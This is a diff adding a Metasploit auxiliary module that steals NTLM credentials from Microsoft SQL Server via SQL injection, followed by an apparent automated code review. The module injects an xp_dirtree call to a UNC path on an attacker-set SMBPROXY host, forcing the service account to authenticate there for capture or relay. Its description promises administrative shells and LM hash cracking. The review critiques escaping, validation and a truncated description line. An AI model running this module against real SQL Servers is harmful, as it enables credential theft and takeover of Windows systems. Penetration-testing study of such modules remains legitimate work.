| 1 | +require 'msf/core' |
| 2 | + |
| 3 | +class Metasploit3 < Msf::Auxiliary |
| 4 | + |
| 5 | + include Rex::Text |
| 6 | + include Msf::Exploit::Remote::MSSQL_SQLI |
| 7 | + |
| 8 | + def initialize(info = {}) |
| 9 | + super(update_info(info, |
| 10 | + 'Name' => 'Microsoft SQL Server NTLM Stealer - SQLi', |
| 11 | + 'Description' => %q{ |
| 12 | + This module can be used to help capture or relay the LM/NTLM |
| 13 | + credentials of the account running the remote SQL Server service. |
| 14 | + The module will use the SQL injection from GET_PATH to connect to the |
| 15 | + target SQL Server instance and execute the native "xp_dirtree" or |
| 16 | + stored procedure. The stored procedures will then |
| 17 | + force the service account to authenticate to the system defined in |
| 18 | + the SMBProxy option. In order for the attack to be successful, the |
| 19 | + SMB capture or relay module must be running on the system defined |
| 20 | + as the SMBProxy. The database account used to connect to the |
| 21 | + database should only require the "PUBLIC" role to execute. |
| 22 | + Successful execution of this attack usually results in local |
| 23 | + administrative access to the Windows system. Specifically, this |
| 24 | + works great for relaying credentials between two SQL Servers using |
| 25 | + a shared service account to get shells. However, if the relay fails, |
| 26 | + then the LM hash can be reversed using the Halflm rainbow tables and |
| 27 | + john the ripper. |
| 28 | + }, |
| 29 | + 'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>', 'Antti <antti.rantasaari[at]netspi.com>' ], |
| 30 | + 'License' => MSF_LICENSE, |
| 31 | + 'Targets' => |
| 32 | + [ |
| 33 | + [ 'Automatic', { } ], |
| 34 | + ], |
| 35 | + 'DefaultTarget' => 0, |
| 36 | + 'Platform' => [ 'Windows' ], |
| 37 | + 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]], |
| 38 | + )) |
| 39 | + |
| 40 | + register_options( |
| 41 | + [ |
| 42 | + OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']), |
| 43 | + ], self.class) |
| 44 | + end |
| 45 | + |
| 46 | + def run |
| 47 | + |
| 48 | + # Reminder |
| 49 | + print_status("DONT FORGET to run a SMB capture or relay module!") |
| 50 | + |
| 51 | + # Generate random file name |
| 52 | + rand_filename = Rex::Text.rand_text_alpha(8, bad='') |
| 53 | + |
| 54 | + # Setup query - double escaping backslashes |
| 55 | + sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'" |
| 56 | + print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}") |
| 57 | + |
| 58 | + # Execute query to force authentation from backend database to smbproxy |
| 59 | + mssql_query(sql) |
| 60 | + end |
| 61 | +end |
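Review bot: SMBPROXY is registered as an OptString in the register_options block but is interpolated straight into the single-quoted xp_dirtree argument in the `sql` assignment, so a value containing a quote or backslash breaks the query at run time instead of being rejected up front; `OptAddress.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),` lets the framework validate it before run is reached. In that same string the backslash counts are uneven once Ruby unescapes them (four before the host, one before the file name), so if the injection path really does unescape once, as the "double escaping backslashes" comment suggests, the host prefix and the file separator cannot both come out right — the intended rendered query deserves a comment, or a check against what mssql_query actually sends. `rand_text_alpha(8, bad='')` assigns a throw-away local just to pass an empty exclusion set; `rand_filename = Rex::Text.rand_text_alpha(8)` reads the same, and the `include Rex::Text` line is then unused since the call is fully qualified. The Description sentence ending in `"xp_dirtree" or` is missing its second procedure name.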